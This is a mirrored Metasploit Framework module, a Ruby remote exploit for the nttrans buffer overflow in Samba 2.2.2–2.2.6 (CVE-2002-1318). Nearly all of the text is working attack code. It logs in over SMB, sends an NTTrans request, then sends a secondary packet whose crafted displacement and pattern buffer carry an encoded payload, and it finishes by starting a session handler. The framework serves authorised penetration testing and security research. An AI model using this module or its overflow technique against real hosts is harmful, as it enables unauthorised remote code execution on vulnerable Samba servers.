Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/samba/nttrans.rb
19720 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',

16
        'Description' => %q{

17
          This module attempts to exploit a buffer overflow vulnerability present in

18
          versions 2.2.2 through 2.2.6 of Samba.

19


20
          The Samba developers report this as:

21
          "Bug in the length checking for encrypted password change requests from clients."

22


23
          The bug was discovered and reported by the Debian Samba Maintainers.

24
        },

25
        'Author' => [ 'hdm' ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2002-1318' ],

29
          [ 'OSVDB', '14525' ],

30
          [ 'BID', '6210' ],

31
          [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]

32
        ],

33
        'Privileged' => true,

34
        'Platform' => 'linux',

35
        'Payload' => {

36
          'Space' => 1024,

37
          'BadChars' => "\x00",

38
          'MinNops' => 512,

39
        },

40
        'Targets' => [

41
          [

42
            "Samba 2.2.x Linux x86",

43
            {

44
              'Arch' => ARCH_X86,

45
              'Platform' => 'linux',

46
              'Rets' => [0x01020304, 0x41424344],

47
            },

48
          ],

49
        ],

50
        'DisclosureDate' => '2003-04-07',

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        Opt::RPORT(139)

62
      ]

63
    )

64


65
    deregister_options('SMB::ProtocolVersion')

66
  end

67


68
  def exploit

69
    # 0x081fc968

70


71
    pattern = Rex::Text.pattern_create(12000)

72


73
    pattern[532, 4] = [0x81b847c].pack('V')

74
    pattern[836, payload.encoded.length] = payload.encoded

75


76
    # 0x081b8138

77


78
    connect(versions: [1])

79
    smb_login

80


81
    targ_address = 0xfffbb7d0

82


83
    #

84
    # Send a NTTrans request with ParameterCountTotal set to the buffer length

85
    #

86


87
    subcommand = 1

88
    param = ''

89
    body = ''

90
    setup_count = 0

91
    setup_data = ''

92
    data = param + body

93


94
    pkt = CONST::SMB_NTTRANS_PKT.make_struct

95
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])

96


97
    base_offset = pkt.to_s.length + (setup_count * 2) - 4

98
    param_offset = base_offset

99
    data_offset = param_offset + param.length

100


101
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT

102
    pkt['Payload']['SMB'].v['Flags1'] = 0x18

103
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001

104
    pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count

105


106
    pkt['Payload'].v['ParamCountTotal'] = 12000

107
    pkt['Payload'].v['DataCountTotal'] = body.length

108
    pkt['Payload'].v['ParamCountMax'] = 1024

109
    pkt['Payload'].v['DataCountMax'] = 65504

110
    pkt['Payload'].v['ParamCount'] = param.length

111
    pkt['Payload'].v['ParamOffset'] = param_offset

112
    pkt['Payload'].v['DataCount'] = body.length

113
    pkt['Payload'].v['DataOffset'] = data_offset

114
    pkt['Payload'].v['SetupCount'] = setup_count

115
    pkt['Payload'].v['SetupData'] = setup_data

116
    pkt['Payload'].v['Subcommand'] = subcommand

117


118
    pkt['Payload'].v['Payload'] = data

119


120
    self.simple.client.smb_send(pkt.to_s)

121
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)

122


123
    #

124
    # Send a NTTrans secondary request with the magic displacement

125
    #

126


127
    param = pattern

128
    body = ''

129
    data = param + body

130


131
    pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct

132
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])

133


134
    base_offset = pkt.to_s.length - 4

135
    param_offset = base_offset

136
    data_offset = param_offset + param.length

137


138
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY

139
    pkt['Payload']['SMB'].v['Flags1'] = 0x18

140
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001

141
    pkt['Payload']['SMB'].v['WordCount'] = 18

142


143
    pkt['Payload'].v['ParamCountTotal'] = param.length

144
    pkt['Payload'].v['DataCountTotal'] = body.length

145
    pkt['Payload'].v['ParamCount'] = param.length

146
    pkt['Payload'].v['ParamOffset'] = param_offset

147
    pkt['Payload'].v['ParamDisplace'] = targ_address

148
    pkt['Payload'].v['DataCount'] = body.length

149
    pkt['Payload'].v['DataOffset'] = data_offset

150


151
    pkt['Payload'].v['Payload'] = data

152


153
    self.simple.client.smb_send(pkt.to_s)

154
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)

155


156
    handler

157
  end

158
end

159


160